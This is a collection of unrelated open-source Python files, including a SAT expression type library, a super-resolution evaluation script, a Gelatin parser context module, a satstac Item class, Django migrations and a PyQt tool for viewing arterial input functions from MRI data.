elif name == "Expr":
cls.base_type.Expr = type(name, bases, namespace)
# -*- Some Magic -*- A-bra-ca-da-bra -*-
cls.base_type.Expr.RULES.update(cls.base_type.Expr.get_rules())
return cls.base_type.Expr
else:
return type(name, bases, namespace)
class SatType(metaclass=MetaSatType):
""""""
def __init__(self, *, source: Source = None, lexpos: int = None):
if isinstance(source, Source):
source.track(self, lexpos)
elif source is None:
Source.blank(self)
else:
raise TypeError(f"Invalid type '{type(source)}' for 'source' argument")
@property
def is_number(self) -> bool:
return False
@property
def is_array(self) -> bool:
return False
@property
def is_expr(self) -> bool:
return False
@property
def is_var(self) -> bool:
return False
# -*- Operator Definition -*-
# :: Aliases
def __invert__(self):
return self._NOT_()
def __and__(self, other):
return self._AND_(other)
def __or__(self, other):
return self._OR_(other)
# :: Logical
def _NOT_(self) -> SatType:
return self.__class__.Expr(T_NOT, self)
def _AND_(self, other: SatType) -> SatType:
return self.__class__.Expr(T_AND, self, other)
def _OR_(self, other: SatType) -> SatType:
return self.__class__.Expr(T_OR, self, other)
def _XOR_(self, other: SatType) -> SatType:
return self.__class__.Expr(T_XOR, self, other)
def _IMP_(self, other: SatType) -> SatType:
return self.__class__.Expr(T_IMP, self, other)
def _IFF_(self, other: SatType) -> SatType:
return self.__class__.Expr(T_IFF, self, other)
def _RIMP_(self, other: SatType) -> SatType:
return self.__class__.Expr(T_RIMP, self, other)
# :: Comparison
def _EQ_(self, other: SatType) -> SatType:
return self.__class__.Expr(T_EQ, self, other)
def _NE_(self, other: SatType) -> SatType:
return self.__class__.Expr(T_NE, self, other)
def _LT_(self, other: SatType) -> SatType:
return self.__class__.Expr(T_LT, self, other)
def _LE_(self, other: SatType) -> SatType:
return self.__class__.Expr(T_LE, self, other)
def _GT_(self, other: SatType) -> SatType:
return self.__class__.Expr(T_GT, self, other)
def _GE_(self, other: SatType) -> SatType:
return self.__class__.Expr(T_GE, self, other)
# :: Indexing
def _IDX_(self, i: tuple) -> SatType:
return self.__class__.Expr(T_IDX, self, *i)
# :: Arithmetic
def _ADD_(self, other: SatType) -> SatType:
return self.__class__.Expr(T_ADD, self, other)
def _SUB_(self, other: SatType) -> SatType:
return self.__class__.Expr(T_SUB, self, other)
def _DIV_(self, other: SatType) -> SatType:
return self.__class__.Expr(T_DIV, self, other)
def _MUL_(self, other: SatType) -> SatType:
return self.__class__.Expr(T_MUL, self, other)
def _NEG_(self) -> SatType:
return self.__class__.Expr(T_NEG, self)
__all__ = ["SatType"]
| 2.28125 | 2 |
evaluate.py | wmylxmj/Anime-Super-Resolution | 120 | 12766362 | # -*- coding: utf-8 -*-
"""
Created on Tue Apr 30 21:24:36 2019
@author: wmy
"""
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
from PIL import Image
from keras import backend as K
from keras.losses import mean_absolute_error, mean_squared_error
from keras.models import load_model
from keras.optimizers import Adam
import random
import os
from model import wdsr_a, wdsr_b
from utils import DataLoader
model = wdsr_b(scale=4, num_res_blocks=32)
model.load_weights('./weights/wdsr-b-32-x4.h5')
data_loader = DataLoader(scale=4)
def evaluate_test(model, setpath='datasets/train', difficulty='easy', name='evaluate'):
images = data_loader.search(setpath)
image = random.choice(images)
hr = data_loader.imread(image)
resize = (hr.size[0]//data_loader.scale, hr.size[1]//data_loader.scale)
hidden_scale = random.uniform(1, 3)
radius = random.uniform(1, 3)
if difficulty=='easy':
hidden_scale = random.uniform(1, 1.5)
radius = random.uniform(1, 1.5)
pass
elif difficulty=='normal':
hidden_scale = random.uniform(1.5, 2)
radius = random.uniform(1.5, 2)
pass
elif difficulty=='hard':
hidden_scale = random.uniform(2, 2.5)
radius = random.uniform(2, 2.5)
pass
elif difficulty=='lunatic':
hidden_scale = random.uniform(2.5, 3)
radius = random.uniform(2.5, 3)
pass
else:
raise ValueError("unknown difficulty")
hidden_resize = (int(resize[0]/hidden_scale), int(resize[1]/hidden_scale))
lr = data_loader.gaussianblur(hr, radius)
lr = lr.resize(hidden_resize)
lr = lr.resize(resize)
lr_resize = lr.resize(hr.size)
lr = np.asarray(lr)
sr = model.predict(np.array([lr]))[0]
sr = np.clip(sr, 0, 255)
sr = sr.astype('uint8')
lr = Image.fromarray(lr)
sr = Image.fromarray(sr)
lr_resize.save("images/" + name + "_lr.jpg")
sr.save("images/" + name + "_sr.jpg")
hr.save("images/" + name + "_hr.jpg")
pass
evaluate_test(model, difficulty='easy', name='easy')
evaluate_test(model, difficulty='normal', name='normal')
evaluate_test(model, difficulty='hard', name='hard')
evaluate_test(model, difficulty='lunatic', name='lunatic')
| 2.3125 | 2 |
Gelatin/compiler/Context.py | Etherbay/Gelatin | 107 | 12766363 | <filename>Gelatin/compiler/Context.py
# Copyright (c) 2010-2017 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import codecs
def do_next(context):
return 0
def do_skip(context):
return 1
def do_fail(context, message='No matching statement found'):
context._error(message)
def do_say(context, message):
context._msg(message)
return 0
def do_warn(context, message):
context._warn(message)
return 0
def do_return(context, levels=1):
# print "do.return():", -levels
return -levels
def out_create(context, path, data=None):
# print "out.create():", path, data
context.builder.create(path, data)
context.builder.enter(path)
context._trigger(context.on_add, context.re_stack[-1])
context.builder.leave()
return 0
def out_replace(context, path, data=None):
# print "out.replace():", path, data
context.builder.add(path, data, replace=True)
context.builder.enter(path)
context._trigger(context.on_add, context.re_stack[-1])
context.builder.leave()
return 0
def out_add(context, path, data=None):
# print "out.add():", path, data
context.builder.add(path, data)
context.builder.enter(path)
context._trigger(context.on_add, context.re_stack[-1])
context.builder.leave()
return 0
def out_add_attribute(context, path, name, value):
# print "out.add_attribute():", path, name, value
context.builder.add_attribute(path, name, value)
context.builder.enter(path)
context._trigger(context.on_add, context.re_stack[-1])
context.builder.leave()
return 0
def out_open(context, path):
# print "out.open():", path
context.builder.open(path)
context._trigger(context.on_add, context.re_stack[-1])
context.stack[-1].on_leave.append((context.builder.leave, ()))
return 0
def out_enter(context, path):
# print "out.enter():", path
context.builder.enter(path)
context._trigger(context.on_add, context.re_stack[-1])
context.stack[-1].on_leave.append((context.builder.leave, ()))
return 0
def out_enqueue_before(context, regex, path, data=None):
# print "ENQ BEFORE", regex.pattern, path, data
context.on_match_before.append((regex, out_add, (context, path, data)))
return 0
def out_enqueue_after(context, regex, path, data=None):
# print "ENQ AFTER", regex.pattern, path, data
context.on_match_after.append((regex, out_add, (context, path, data)))
return 0
def out_enqueue_on_add(context, regex, path, data=None):
# print "ENQ ON ADD", regex.pattern, path, data
context.on_add.append((regex, out_add, (context, path, data)))
return 0
def out_clear_queue(context):
context._clear_triggers()
return 1
def out_set_root_name(context, name):
context.builder.set_root_name(name)
return 0
class Context(object):
def __init__(self):
self.functions = {'do.fail': do_fail,
'do.return': do_return,
'do.next': do_next,
'do.skip': do_skip,
'do.say': do_say,
'do.warn': do_warn,
'out.create': out_create,
'out.replace': out_replace,
'out.add': out_add,
'out.add_attribute': out_add_attribute,
'out.open': out_open,
'out.enter': out_enter,
'out.enqueue_before': out_enqueue_before,
'out.enqueue_after': out_enqueue_after,
'out.enqueue_on_add': out_enqueue_on_add,
'out.clear_queue': out_clear_queue,
'out.set_root_name': out_set_root_name}
self.lexicon = {}
self.grammars = {}
self.input = None
self.builder = None
self.end = 0
self._init()
def _init(self):
self.start = 0
self.re_stack = []
self.stack = []
self._clear_triggers()
def _clear_triggers(self):
self.on_match_before = []
self.on_match_after = []
self.on_add = []
def _trigger(self, triggers, match):
matching = []
for trigger in triggers:
regex, func, args = trigger
if regex.search(match.group(0)) is not None:
matching.append(trigger)
for trigger in matching:
triggers.remove(trigger)
for trigger in matching:
regex, func, args = trigger
func(*args)
def _match_before_notify(self, match):
self.re_stack.append(match)
self._trigger(self.on_match_before, match)
def _match_after_notify(self, match):
self._trigger(self.on_match_after, match)
self.re_stack.pop()
def _get_lineno(self):
return self.input.count('\n', 0, self.start) + 1
def _get_line(self, number=None):
if number is None:
number = self._get_lineno()
return self.input.split('\n')[number - 1]
def _get_line_position_from_char(self, char):
line_start = char
while line_start != 0:
if self.input[line_start - 1] == '\n':
break
line_start -= 1
line_end = self.input.find('\n', char)
return line_start, line_end
def _format(self, error):
start, end = self._get_line_position_from_char(self.start)
line_number = self._get_lineno()
line = self._get_line()
offset = self.start - start
token_len = 1
output = line + '\n'
if token_len <= 1:
output += (' ' * offset) + '^\n'
else:
output += (' ' * offset) + "'" + ('-' * (token_len - 2)) + "'\n"
output += '%s in line %s' % (error, line_number)
return output
def _msg(self, error):
print(self._format(error))
def _warn(self, error):
sys.stderr.write(self._format(error) + '\n')
def _error(self, error):
raise Exception(self._format(error))
def _eof(self):
return self.start >= self.end
def parse_string(self, input, builder, debug=0):
self._init()
self.input = input
self.builder = builder
self.end = len(input)
self.grammars['input'].parse(self, debug)
if self.start < self.end:
self._error('parser returned, but did not complete')
def parse(self, filename, builder, encoding='utf8', debug=0):
with codecs.open(filename, 'r', encoding=encoding) as input_file:
return self.parse_string(input_file.read(), builder, debug)
def dump(self):
for grammar in self.grammars.values():
print(grammar)
| 2.0625 | 2 |
MxForum/tools/dec_test.py | mtianyan/TornadoForum | 2 | 12766364 | <reponame>mtianyan/TornadoForum
# 装饰器是什么样的
# 装饰器加载过程
import functools
import time
def time_dec(func):
print("dec started")
@functools.wraps(func)
def wrapper(*args, **kwargs):
start_time = time.time()
func(*args, **kwargs)
end_time = time.time()
print("last_time:{}".format(end_time - start_time))
return wrapper
@time_dec
def add(a, b):
time.sleep(3)
return a + b
if __name__ == "__main__":
# 1. 为什么我们调用add的时候报错是wrapper
# 2. 变量如何传递到wrapper中
print(add(1, 2))
| 3.328125 | 3 |
examples/test_context.py | stephenpardy/scopr | 0 | 12766365 | <reponame>stephenpardy/scopr<filename>examples/test_context.py
from scopr import scope
a = 1
def test():
return "Hello, World!"
with scope():
b = 1
a = 2
def test():
return "Goodbye, World!"
print(test())
print("a: {}".format(a))
print(test())
print("b: {}".format(b))
| 2.890625 | 3 |
project1.py | chanseeliu/jupyter-notebook | 0 | 12766366 | <filename>project1.py<gh_stars>0
numbers = [1,2,3,4,5,6]
bignumbers = [a*1000 for a in numbers]
bign=[str(item) for item in bignumbers]
print (bignumbers)
print bign
print "\t".join([str(i) for i in bign])
#m="\t".join([str(i) for i in bign])
#print m
#mm=[int(p) for p in bign]
#print mm
| 3.0625 | 3 |
satstac/item.py | JamesOConnor/sat-stac | 1 | 12766367 | import json
import logging
import os
import traceback
from string import Formatter, Template
from datetime import datetime
from dateutil.parser import parse as dateparse
from satstac import __version__, STACError, Thing, utils
logger = logging.getLogger(__name__)
class Item(Thing):
def __init__(self, *args, **kwargs):
""" Initialize a scene object """
super(Item, self).__init__(*args, **kwargs)
# dictionary of assets by eo:band common_name
self._assets_by_common_name = None
# collection instance
self._collection = kwargs.pop('collection', None)
# TODO = allow passing in of collection (needed for FC catalogs)
def collection(self):
""" Get Collection info for this item """
if self._collection is None:
if self.filename is None:
# TODO - raise exception ?
return None
link = self.links('collection')
if len(link) == 1:
self._collection = Collection.open(link[0])
return self._collection
@property
def eobands(self):
""" Get eo:bands from Item or from Collection """
if 'eo:bands' in self.properties:
return self.properties['eo:bands']
elif self.collection() is not None and 'eo:bands' in self.collection().properties:
return self.collection()['eo:bands']
return []
@property
def properties(self):
""" Get dictionary of properties """
return self._data.get('properties', {})
def __getitem__(self, key):
""" Get key from properties """
val = super(Item, self).__getitem__(key)
if val is None:
if self.collection() is not None:
# load properties from Collection
val = self._collection[key]
return val
@property
def date(self):
return self.datetime.date()
@property
def datetime(self):
return dateparse(self['datetime'])
@property
def geometry(self):
return self._data['geometry']
@property
def bbox(self):
""" Get bounding box of scene """
return self._data['bbox']
@property
def assets(self):
""" Return dictionary of assets """
return self._data.get('assets', {})
@property
def assets_by_common_name(self):
""" Get assets by common band name (only works for assets containing 1 band """
if self._assets_by_common_name is None and len(self.eobands) > 0:
self._assets_by_common_name = {}
for a in self.assets:
bands = self.assets[a].get('eo:bands', [])
if len(bands) == 1:
eo_band = self.eobands[bands[0]].get('common_name')
if eo_band:
self._assets_by_common_name[eo_band] = self.assets[a]
return self._assets_by_common_name
def asset(self, key):
""" Get asset for this key OR common_name """
if key in self.assets:
return self.assets[key]
elif key in self.assets_by_common_name:
return self.assets_by_common_name[key]
logging.warning('No such asset (%s)' % key)
return None
def get_filename(self, path='', filename='${id}', extension='.json'):
""" Get complete path with filename to this item """
return os.path.join(
self.substitute(path),
self.substitute(filename) + extension
)
def substitute(self, string):
""" Substitute envvars in string with Item values """
string = string.replace(':', '_colon_')
subs = {}
for key in [i[1] for i in Formatter().parse(string.rstrip('/')) if i[1] is not None]:
if key == 'id':
subs[key] = self.id
elif key in ['date', 'year', 'month', 'day']:
vals = {'date': self.date, 'year': self.date.year, 'month': self.date.month, 'day': self.date.day}
subs[key] = vals[key]
else:
subs[key] = self[key.replace('_colon_', ':')]
return Template(string).substitute(**subs)
def download_assets(self, keys=None, **kwargs):
""" Download multiple assets """
if keys is None:
keys = self._data['assets'].keys()
filenames = []
for key in keys:
filenames.append(self.download(key, **kwargs))
return filenames
def download(self, key, overwrite=False, path='', filename='${id}', requestor_pays=False):
""" Download this key (e.g., a band, or metadata file) from the scene """
asset = self.asset(key)
if asset is None:
return None
_path = self.substitute(path)
utils.mkdirp(_path)
_filename = None
try:
fname = self.substitute(filename)
ext = os.path.splitext(asset['href'])[1]
fout = os.path.join(_path, fname + '_' + key + ext)
if not os.path.exists(fout) or overwrite:
_filename = utils.download_file(asset['href'], filename=fout, requestor_pays=requestor_pays)
else:
_filename = fout
except Exception as e:
_filename = None
logger.error('Unable to download %s: %s' % (asset['href'], str(e)))
logger.debug(traceback.format_exc())
return _filename
'''
@classmethod
def create_derived(cls, scenes):
""" Create metadata for dervied scene from multiple input scenes """
# data provenance, iterate through links
links = []
for i, scene in enumerate(scenes):
links.append({
'rel': 'derived_from',
'href': scene.links['self']['href']
})
# calculate composite geometry and bbox
geom = scenes[0].geometry
# properties
props = {
'id': '%s_%s' % (scenes[0].date, scenes[0]['eo:platform']),
'datetime': scenes[0]['datetime']
}
collections = [s['c:id'] for s in scenes if s['c:id'] is not None]
if len(collections) == 1:
props['c:id'] = collections[0]
item = {
'properties': props,
'geometry': geom,
'links': links,
'assets': {}
}
return Item(item)
'''
# import and end of module prevents problems with circular dependencies.
# Catalogs use Items and Items use Collections (which are Catalogs)
from .collection import Collection | 2.375 | 2 |
examples/consts/linewidth.py | strakam/PyEasyGraphics | 5 | 12766368 | <filename>examples/consts/linewidth.py
from easygraphics import *
def main():
init_graph(800, 600)
line(50, 50, 400, 400)
set_line_width(20)
line(50, 400, 400, 50)
pause()
close_graph()
easy_run(main) | 2.078125 | 2 |
tukiogram/migrations/0005_auto_20170319_2103.py | charitymbaka/samaritan-final | 0 | 12766369 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-19 18:03
from __future__ import unicode_literals
import django.contrib.gis.db.models.fields
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('tukiogram', '0004_auto_20170316_1435'),
]
operations = [
migrations.AlterField(
model_name='tukio',
name='location_geom',
field=django.contrib.gis.db.models.fields.PointField(srid=4326, unique=True),
),
]
| 1.445313 | 1 |
excel_dates/__init__.py | AutoActuary/excel-dates | 8 | 12766370 | from .convert import *
| 1.21875 | 1 |
webdev/vendas/migrations/0003_auto_20210530_1548.py | h-zanetti/jewelry-manager | 0 | 12766371 | # Generated by Django 3.1.5 on 2021-05-30 18:48
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('financeiro', '0021_auto_20210530_1434'),
('vendas', '0002_auto_20210528_1954'),
]
operations = [
migrations.AlterField(
model_name='venda',
name='receita',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='financeiro.receita', verbose_name='Receita'),
),
]
| 1.265625 | 1 |
Ago-Dic-2019/Ricardo_Romero_Medina/Practica1/Practica_4-7.py | Arbupa/DAS_Sistemas | 41 | 12766372 | <filename>Ago-Dic-2019/Ricardo_Romero_Medina/Practica1/Practica_4-7.py
numbers=list(range(3,31,3))
for i in range(len(numbers)):
print(numbers[i]) | 3.78125 | 4 |
research/part04_application_to_rl/e01_learn_xy_representations/_util.py | nmichlo/msc-research | 1 | 12766373 | <reponame>nmichlo/msc-research<filename>research/part04_application_to_rl/e01_learn_xy_representations/_util.py
# ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~
# MIT License
#
# Copyright (c) 2022 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~
import logging
import sys
from typing import Optional
import psutil
log = logging.getLogger(__name__)
# ========================================================================= #
# Helper #
# ========================================================================= #
def get_num_workers(
num_workers: Optional[int] = None,
default_max: int = 16,
) -> int:
if sys.platform == 'darwin':
auto_workers = 0
if num_workers is None:
log.warning(f'MacOS detected, setting num_workers to {auto_workers} to avoid Dataloader bug.')
num_workers = auto_workers
elif num_workers > auto_workers:
log.warning(f'MacOS detected, but manually set num_workers is greater than zero at {num_workers}, might result in a Dataloader bug!')
else:
auto_workers = min(psutil.cpu_count(logical=False), default_max)
if num_workers is None:
num_workers = auto_workers
log.warning(f'Automatically set num_workers to {num_workers}, cpu_count is {psutil.cpu_count(logical=False)}, max auto workers is {default_max}')
elif num_workers > auto_workers:
log.warning(f'manually set num_workers at {num_workers} might be too high, cpu_count is {psutil.cpu_count(logical=False)}, max auto workers is {default_max}')
return num_workers
# ========================================================================= #
# END #
# ========================================================================= #
| 1.59375 | 2 |
src/QbiPy/tools/AIF_viewer/AIF_viewer_tool.py | michaelberks/madym_python | 0 | 12766374 | <gh_stars>0
'''
GUI tool for inspecting auto-detected AIFs as generated by Madym
'''
import sys
import os
import glob
from PyQt5.QtWidgets import QApplication, QPushButton, QAction, QMainWindow, QWidget, QMessageBox, QGraphicsScene, QFileDialog
from PyQt5.QtCore import QObject, Qt, pyqtSlot
from PyQt5.QtGui import QImage, qRgb
import numpy as np
from scipy import ndimage
from QbiPy.image_io.analyze_format import read_analyze_img
from QbiPy.tools import qbiqscene as qs
from QbiPy.tools.AIF_viewer.AIF_viewer import Ui_AIFViewer
from QbiPy.dce_models.dce_aif import Aif, AifType
image_format = "*.hdr"
AIF_format = "*_AIF.txt"
class AIFViewerTool(QMainWindow):
# --------------------------------------------------------------------
# --------------------------------------------------------------------
def __init__(self, AIF_dir=None, dynamic_image=None, parent=None):
#Create the UI
QWidget.__init__(self, parent)
self.ui = Ui_AIFViewer()
self.ui.setupUi(self)
self.ui.scene1 = qs.QbiQscene()
self.ui.leftGraphicsView.setScene(self.ui.scene1)
self.ui.colorbar = qs.QbiQscene()
self.ui.colorbarGraphicsView.setScene(self.ui.colorbar)
#Initialize instance variables
self.AIF_names = []
self.num_AIFs = 0
self.curr_AIF = 0
self.AIFs = []
self.AIF_masks = []
self.num_slices = 0
self.curr_slice = 0
if AIF_dir == None:
self.AIF_dir = ''
self.select_AIF_dir()
else:
self.AIF_dir = AIF_dir
self.ui.aifDirLineEdit.setText(AIF_dir)
if dynamic_image is None:
self.dynamic_image_path = ''
self.select_dynamic_image()
else:
self.dynamic_image_path = dynamic_image
self.ui.dynVolLineEdit.setText(dynamic_image)
# Connect any signals that aren't auto name matched
def connect_signals_to_slots(self):
pass
#QtCore.QObject.connect(self.ui.button_open,QtCore.SIGNAL("clicked()"), self.file_dialog)
# --------------------------------------------------------------------
#--------------------------------------------------------------------------
#--------------------------------------------------------------------------
# Auxilliary functions that control data
#
#--------------------------------------------------------------------------
def get_AIF_list(self, init_AIF=0):
#Get list of image names and update the relevant controls
#Load in the initial subject
if not os.path.isdir(self.AIF_dir):
QMessageBox.warning(self, 'AIF directory not found!',
self.AIF_dir + ' is not a directory, check disk is connected')
return
self.AIF_names = [os.path.basename(f) for f in glob.glob(
os.path.join(self.AIF_dir, AIF_format))]
self.num_AIFs = len(self.AIF_names)
if self.num_AIFs:
if init_AIF and init_AIF <= self.num_AIFs:
self.curr_AIF = init_AIF
else:
self.curr_AIF = 0
#Update uicontrols now we have data
self.ui.aifComboBox.setEnabled(True)
self.ui.aifComboBox.clear()
AIF_text = 'AIFs in folder:'
for aif in self.AIF_names:
self.ui.aifComboBox.addItem(aif)
AIF_text += '\n'
AIF_text += aif
self.ui.aifInfoTextEdit.setText(AIF_text)
#Load in the images
self.load_AIFs()
#Load in the images for the first pair and update the pair
#selecter
self.update_curr_AIF()
else:
QMessageBox.warning(self, 'No subjects found!', 'No subjects found in ' + self.AIF_dir)
#--------------------------------------------------------------------------
def load_dynamic_image(self):
if not os.path.isfile(self.dynamic_image_path):
QMessageBox.warning(self, 'Dynamic image not found!',
self.dynamic_image_path + ' does not exist, check disk is connected')
return
self.dynamic_image = read_analyze_img(self.dynamic_image_path)
#Get size of this image
self.num_slices = self.dynamic_image.shape[2]
#By default stay on the same previous slice as before
if self.curr_slice >= self.num_slices:
self.curr_slice = self.num_slices-1
#Set slices slider
if self.num_slices > 1:
self.ui.sliceSlider.setRange(1, self.num_slices)
self.ui.sliceSlider.setSingleStep(1)
self.ui.sliceSlider.setValue(self.curr_slice+1)
self.ui.sliceSlider.setEnabled(True)
#Display image
self.update_volume_display()
#Make colorbar
self.make_colorbar()
#--------------------------------------------------------------------------
def load_AIFs(self):
#h = waitbar(0,'Loading MR volumes. Please wait...')
self.AIFs = []
self.AIF_masks = []
for AIF_name in self.AIF_names:
aif_path = os.path.join(self.AIF_dir, AIF_name)
aif = Aif(aif_type=AifType.FILE, filename=aif_path)
self.AIFs.append(aif)
aif_mask_name = os.path.splitext(aif_path)[0] + ".hdr"
if os.path.isfile(aif_mask_name):
aif_mask = read_analyze_img(aif_mask_name)
self.AIF_masks.append(aif_mask==1)
else:
self.AIF_masks.append(None)
print('Missing mask ', aif_mask_name)
if self.curr_AIF >= self.num_AIFs:
self.curr_AIF = self.num_AIFs-1
#----------------------------------------------------------------------
def update_curr_AIF(self):
AIF_text = 'Select AIF: ' + str(self.curr_AIF+1) + ' of ' + str(self.num_AIFs)
self.ui.selectAifLabel.setText(AIF_text)
self.ui.aifComboBox.setCurrentIndex(self.curr_AIF)
self.ui.nextAifButton.setEnabled(self.curr_AIF < self.num_AIFs-1)
self.ui.previousAifButton.setEnabled(self.curr_AIF)
#Display image
self.update_AIF_display()
#--------------------------------------------------------------------------
def update_AIF_display(self):
aif = self.AIFs[self.curr_AIF]
self.ui.aifPlotWidget.canvas.ax.clear()
self.ui.aifPlotWidget.canvas.ax.plot(
aif.times_, aif.base_aif_)
self.ui.aifPlotWidget.canvas.ax.set_xlabel(
'Time (mins)')
self.ui.aifPlotWidget.canvas.ax.set_ylabel(
'C(t)')
self.ui.aifPlotWidget.canvas.ax.set_title(
self.AIF_names[self.curr_AIF])
self.ui.aifPlotWidget.canvas.draw()
#--------------------------------------------------------------------------
def update_volume_display(self):
self.ui.scene1.reset()
#Get current slice of each volume
slice = self.dynamic_image[:,:,self.curr_slice]
self.slice_min = np.min(slice[np.isfinite(slice)])
self.slice_max = np.max(slice[np.isfinite(slice)])
if self.slice_min == self.slice_max:
self.slice_range = 1
else:
self.slice_range = self.slice_max - self.slice_min
scaled_slice = (255*(slice-self.slice_min) / self.slice_range).astype(np.uint8)
#Compute the apsect ratios for these images (they may vary from
#pair to pair)
height,width = slice.shape
#Compute map limits for color scaling
min_contrast = 0
max_contrast = 255
self.ui.minContrastSlider.setRange(min_contrast, max_contrast-1)
self.ui.minContrastSlider.setSingleStep(1)
self.ui.minContrastSlider.setValue(min_contrast)
self.ui.minContrastSlider.setEnabled(True)
self.ui.maxContrastSlider.setRange(min_contrast+1, max_contrast)
self.ui.maxContrastSlider.setSingleStep(1)
self.ui.maxContrastSlider.setValue(max_contrast)
self.ui.maxContrastSlider.setEnabled(True)
self.set_contrast_label(min_contrast, max_contrast)
#Make the maps visible
self.ui.scene1.update_raw_color_table(min_contrast, max_contrast)
q_img1 = QImage(scaled_slice.data, width, height, QImage.Format_Indexed8)
self.ui.scene1.set_image(q_img1)
self.ui.leftGraphicsView.fitInView(self.ui.scene1.itemsBoundingRect(),
Qt.KeepAspectRatio)
self.ui.scene1.update()
#Add annotation if any
aif_mask = self.AIF_masks[self.curr_AIF]
if not aif_mask is None:
aif_mask_slice = aif_mask[:,:,self.curr_slice]
aif_xyz = np.nonzero(aif_mask_slice)
if len(aif_xyz[0]):
self.ui.scene1.add_annotation_points(aif_xyz[1] - width/2, aif_xyz[0] - height/2)
else:
self.ui.scene1.clear_annotation_points()
self.ui.dynVolLabel.setText('%s: slice %d'
%(
os.path.basename(self.dynamic_image_path),
self.curr_slice+1))
self.ui.selectSliceLabel.setText('Select slice: %d of %d'
%(self.curr_slice+1, self.num_slices))
#--------------------------------------------------------------------------
def select_dynamic_image(self):
self.ui.dynVolLineEdit.setEnabled(False)
temp_path = QFileDialog.getOpenFileName(self, 'Open file',
self.dynamic_dir, "Image files (*.hdr)")
if temp_path:
self.dynamic_dir = os.path.dirname(temp_path)
self.dynamic_image_path = temp_path
self.ui.dynVolLineEdit.setText(temp_path)
self.ui.dynVolLineEdit.setEnabled(True)
#--------------------------------------------------------------------------
def select_AIF_dir(self):
self.ui.aifDirLineEdit.setEnabled(False)
temp_dir = QFileDialog.getExistingDirectory(self, 'Select the AIF directory',
self.AIF_dir,
QFileDialog.ShowDirsOnly)
if temp_dir:
self.AIF_dir = temp_dir
self.ui.aifDirLineEdit.setText(temp_dir)
if not self.dynamic_dir:
self.dynamic_dir = self.AIF_dir
self.ui.aifDirLineEdit.setEnabled(True)
#--------------------------------------------------------------------------
def set_contrast_label(self, min_contrast, max_contrast):
min_val = self.slice_range*min_contrast/255 + self.slice_min
max_val = self.slice_range*max_contrast/255 + self.slice_min
self.ui.minContrast.setText('%g' %(min_val))
self.ui.maxContrast.setText('%g' %(max_val))
self.ui.minContrast1.setText('%g' %(min_val))
self.ui.maxContrast1.setText('%g' %(max_val))
def make_colorbar(self):
self.ui.colorbarGraphicsView.setHorizontalScrollBarPolicy(
Qt.ScrollBarAlwaysOff)
self.ui.colorbarGraphicsView.setVerticalScrollBarPolicy(
Qt.ScrollBarAlwaysOff)
self.ui.colorbar.reset()
self.ui.colorbar.update_raw_color_table(0, 255)
colorbar = np.repeat(np.expand_dims(np.arange(255),0), 1, 0).astype(np.uint8)
height,width = colorbar.shape
q_img = QImage(colorbar.data, width, height, QImage.Format_Indexed8)
self.ui.colorbar.set_image(q_img)
self.ui.colorbarGraphicsView.fitInView(self.ui.colorbar.sceneRect(),
Qt.IgnoreAspectRatio)
self.ui.colorbar.update()
#--------------------------------------------------------------------------
#--------------------------------------------------------------------------
# UI Callbacks
# We make use of QT's autoconnect naming feature here so we don't need to
# explicitly connect the various widgets with their callbacks
#--------------------------------------------------------------------------
# -------------------------------------------------------------------------
@pyqtSlot()
def on_aifDirSelectButton_clicked(self):
self.select_AIF_dir()
self.get_AIF_list(0)
# -------------------------------------------------------------------------
@pyqtSlot()
def on_dynVolDirSelectButton_clicked(self):
self.select_dynamic_image()
self.load_dynamic_image()
# --------------------------------------------------------------------
@pyqtSlot()
def on_nextAifButton_clicked(self):
next_aif = self.curr_AIF + 1
if 0 <= next_aif < self.num_AIFs:
self.curr_AIF = next_aif
self.update_curr_AIF()
# --------------------------------------------------------------------
@pyqtSlot()
def on_previousAifButton_clicked(self):
next_aif = self.curr_AIF - 1
if 0 <= next_aif < self.num_AIFs:
self.curr_AIF = next_aif
self.update_curr_AIF()
# --------------------------------------------------------------------
def on_aifComboBox_activated(self):
self.curr_AIF = self.ui.aifComboBox.currentIndex()
